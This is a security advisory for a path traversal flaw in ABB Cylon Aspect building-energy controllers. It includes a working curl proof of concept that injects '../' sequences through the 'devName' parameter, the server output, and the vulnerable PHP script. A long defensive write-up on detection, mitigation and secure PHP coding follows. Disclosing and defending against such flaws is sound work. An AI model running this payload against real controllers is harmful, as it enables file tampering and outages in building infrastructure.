ABB Cylon Aspect 3.08.02 (ethernetUpdate.php) - Authenticated Path Traversal
# Exploit Title: ABB Cylon Aspect 3.08.02 (ethernetUpdate.php) - Authenticated Path Traversal
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon controller suffers from an authenticated path traversal
vulnerability. This can be exploited through the 'devName' POST parameter in
the ethernetUpdate.php script to write partially controlled content, such as
IP address values, into arbitrary file paths, potentially leading to configuration
tampering and system compromise including denial of service scenario through
ethernet configuration backup file overwrite.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5890
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5890.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl http://192.168.73.31/ethernetUpdate.php \
> -d "listFile=%2Fusr%2Flocal%2Faam%2Fetc%2Feth0\
> &devName=../../../../../../../home/MIX_CMIX/htmlroot/testingus\
> &useDHCP=1\
> &dhcp=YES\
> &IP1=192&IP2=168&IP3=73&IP4=31\
> &SM1=255&SM2=255&SM3=255&SM4=0\
> &N1=192&N2=168&N3=1&N4=0\
> &B1=192&B2=168&B3=1&B4=255\
> &GW1=192&GW2=168&GW3=1&GW4=254\
> &DNSA1=&DNSA2=&DNSA3=&DNSA4=\
> &DNSB1=&DNSB2=&DNSB3=&DNSB4=\
> &submitTime=Submit" \
> -H "Cookie: PHPSESSID=xxx"
<html>
<head>
<title>Web Server Configuration</title>
<link rel="stylesheet" type="text/css" href="matrixstyle.css"/>
</head>
<body class="workscroll" topmargin="0" leftmargin="0" scroll="No">
<h1>Ethernet Settings</h1>
<p class="subtitle">
Ethernet settings have been successfully updated.<br>Please supply MAC address below to your Network Administrator in order to determine new IP Address.<br><b>MAC Address: </b></p>
<iframe src="ethernetUpdateRun.php" style="visibility:hidden;"/>
</form>
<hr>
</body>
</html>
$ curl http://192.168.73.31/testingus.bak
ONBOOT=yes
DHCP=YES
IPADDR=192.168.73.31
NETMASK=255.255.255.0
GATEWAY=192.168.1.254
NETWORK=192.168.1.0
BROADCAST=192.168.1.255
DNS1=
DNS2=
$ cat -n /home/MIX_CMIX/htmlroot/ethernetUpdateRun.php
1 <?php
2 //---------Begin Authorization-------------
3 require_once 'validate/validateHeader.php';
4 //--------End Authorization----------------
5 include "lib/configParameter.php";
6 $lookupLog = "config/configfile";
7 $listFile = trim(obtainValue($lookupLog, "SHELL"));
8 $command = $listFile . "net.sh";
9 $sudo = trim(obtainValue($lookupLog, "SUDO"));
10 logWarning("Ethernet Settings modified");
11 exec($sudo . " " . $listFile . "net.sh");
12 exit();
13
14 ?>ABB Cylon Aspect 3.08.02 (ethernetUpdate.php) — Authenticated Path Traversal (ZSL-2024-5890)
This article explains an authenticated path traversal vulnerability reported in ABB Cylon Aspect devices and servers (NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio) with firmware ≤ 3.08.02. It covers the nature and impact of the issue, safe detection methods, remediation steps, and secure coding practices to prevent similar flaws. The goal is defensive: to help operators mitigate risk, detect exploitation attempts, and implement robust fixes.
Executive summary
- Vulnerability type: Authenticated path traversal in a web endpoint that updates Ethernet/configuration settings.
- Impact: An authenticated user can direct partially controlled configuration data into arbitrary file paths on the device filesystem, enabling configuration tampering, overwriting important files (including network config backups), and potential denial-of-service or further compromise.
- Affected versions: Aspect firmware up to and including 3.08.02 (see vendor advisory for exact list).
- Discovery: Responsible disclosure reported as ZSL-2024-5890.
Why this is serious
Path traversal vulnerabilities that allow writing to arbitrary filesystem locations are high risk because they can be used to:
- Overwrite configuration files (network configuration, startup scripts), causing outages or redirecting traffic.
- Drop or modify files in the webroot to introduce persistent webshells or defacements (if other vulnerabilities exist).
- Corrupt device state, forcing reboots or bricking services.
- Escalate impact in combination with weak process privileges or other local flaws.
Technical overview (high level)
The vulnerable endpoint accepts a filename-like parameter supplied by an authenticated web user and uses it to create or update backup/configuration files. Insufficient input validation allows directory traversal constructs or other manipulations that cause the application to write data outside the intended directory. The application then triggers an OS-level script that reads or executes files in those locations, increasing the impact of a successful traversal.
Attack surface characteristics
- Requires valid web authentication — exploitable by any authorized user or by an attacker who has already obtained credentials or session tokens.
- Vulnerable code performs filesystem writes with insufficient validation and later executes system scripts that operate over those files.
- Typical constraints: application-level filters or limited sanitization but no canonical path checks or whitelist enforcement.
Detection and indicators of compromise (IoCs)
Focus detection on server logs and filesystem changes. The following high-level signs are useful for defenders:
- HTTP requests to ethernetUpdate.php (or similar endpoints) containing filename-like parameters in POST bodies. Monitor authenticated POSTs creating or updating files.
- Unexpected new backup or configuration files written outside the normal config directory, especially in webroot directories or temporary folders.
- Log entries indicating a system script (for example, network reconfiguration scripts) was executed shortly after a web configuration request.
- Unusual changes to network settings, repeated interface restarts, or restored backups from unexpected locations.
Suggested detection rules (example, non-actionable): create alerts for authenticated POSTs to configuration endpoints that include suspicious characters or patterns, and for file creation events outside canonical config directories.
Mitigation and remediation
- Apply vendor updates or firmware patches if available. The vendor advisory and newer firmware releases are the primary fix.
- Limit administrative access: restrict web management access to trusted networks, management VLANs, or via VPN, and enforce multi-factor authentication for admin accounts where supported.
- Harden logging and monitoring: enable detailed logging for web admin endpoints and monitor for unusual file writes and script executions.
- Implement network-level controls: enforce firewall rules and segmentation to restrict who can reach the device management interface.
- Rotate credentials and invalidate sessions if you suspect compromise. If filesystem integrity is uncertain, rebuild from a known-good image and reapply secure configuration.
Immediate compensating controls
- Disable remote web management while applying patches or carrying out forensic checks.
- Restrict access by IP allowlists or management network isolation.
- Audit all configuration and backup files for unexpected content or modification times.
Secure development and hardening guidance (recommended fixes)
Preventing path traversal and arbitrary file writes requires defensive coding and strict validation. The recommended approach:
- Whitelist acceptable filenames or map logical names to physical paths using a server-side table.
- Reject any input that contains directory separators or sequences that can alter the path.
- Use canonical path resolution (realpath) and verify the final path is a subpath of an allowed directory.
- Validate all numeric and structured inputs (e.g., IP address octets) for range and type before composing configuration content.
- Avoid invoking shell commands with user-controlled strings. If shell execution is necessary, use safe APIs and escape arguments or use privileged daemons with fixed inputs.
Example: secure PHP handling pattern (illustrative)
<?php
// Example: safe handling of a "devName" input for writing config backups.
// This is a defensive pattern — adapt to your codebase and environment.
// Assume authentication has already been enforced.
$devName = isset($_POST['devName']) ? $_POST['devName'] : '';
// 1) Basic character whitelist: allow only safe filename characters (no slashes)
if (!preg_match('/^[A-Za-z0-9._-]+$/', $devName)) {
http_response_code(400);
echo 'Invalid device name';
exit;
}
// 2) Build target path inside an allowed directory
$allowedDir = '/usr/local/aam/etc/';
$base = realpath($allowedDir);
if ($base === false) {
http_response_code(500);
exit('Server misconfiguration');
}
$targetPath = $base . DIRECTORY_SEPARATOR . $devName . '.bak';
// 3) Canonicalize and re-check: ensure target is still under allowedDir
$canonical = realpath(dirname($targetPath));
if ($canonical === false || strpos($canonical, $base) !== 0) {
http_response_code(403);
echo 'Forbidden';
exit;
}
// 4) Validate and build content (example: IP octets must be integers 0-255)
function valid_octet($v) {
return is_numeric($v) && (int)$v >= 0 && (int)$v <= 255;
}
$ipParts = [$_POST['IP1'] ?? null, $_POST['IP2'] ?? null, $_POST['IP3'] ?? null, $_POST['IP4'] ?? null];
foreach ($ipParts as $p) {
if (!valid_octet($p)) {
http_response_code(400);
exit('Invalid IP component');
}
}
$ip = implode('.', array_map('intval', $ipParts));
// 5) Write file safely (atomic write with LOCK_EX)
$data = "IPADDR={$ip}\n"; // build required content carefully
file_put_contents($targetPath, $data, LOCK_EX);
// 6) Avoid executing shell commands with untrusted inputs. If a script must run,
// verify its inputs are fixed and sanitized, or use a privileged service that
// reads sanitized configuration files and applies changes.
echo 'OK';
?>
Explanation: The example demonstrates multiple defensive layers — a character whitelist prevents directory separators; building the path from a realpath-verified base prevents path traversal; canonical path checks ensure the final path is within the allowed folder; numeric inputs (such as IP octets) are validated for range; file writes are done with atomic operations. Avoid calling shell commands with concatenated user inputs; prefer controlled daemons or strict argument escaping.
Alternative defensive pattern: filename mapping
A stronger approach is to map logical identifiers to concrete filesystem paths on the server side, e.g., using a server-side array that contains only allowed targets. That removes the need to accept arbitrary filenames from the client.
Post-incident actions and recovery
- If exploitation is suspected, collect webserver logs, process execution logs, and filesystem timestamps before rebooting or patching the device.
- Validate the integrity of startup scripts and network configuration files. Reinstall firmware or restore from a known-good backup if integrity cannot be guaranteed.
- Rotate administrative credentials and revoke any web or API sessions that may have been compromised.
- Apply long-term hardening: restrict management plane access, enable monitoring, and keep firmware updated.
Responsible disclosure and references
This issue was disclosed in the security advisory ZSL-2024-5890. Operators should consult the vendor security bulletin and apply vendor-provided patches or mitigation guidance as a priority. For further defensive details consult standard CWE guidance for path traversal (CWE-22) and secure coding resources for filesystem access control.
| Resource | Notes |
|---|---|
| Vendor advisory / firmware updates | Apply official fixes and contact vendor support for impacted models and firmware versions. |
| CWE-22 (Path Traversal) | Best practices and mitigation patterns for preventing directory traversal. |
| Application logging and monitoring | Audit endpoints that alter configuration and enable alerts for anomalous file writes. |
Final notes
Path traversal vulnerabilities that permit writes are especially dangerous on embedded and infrastructure devices because they can influence system startup, network configuration, and persistent state. Treat any configuration-writing web endpoint as high risk: apply strict whitelisting, canonical path checks, input validation, and minimize how and when privileged scripts are executed.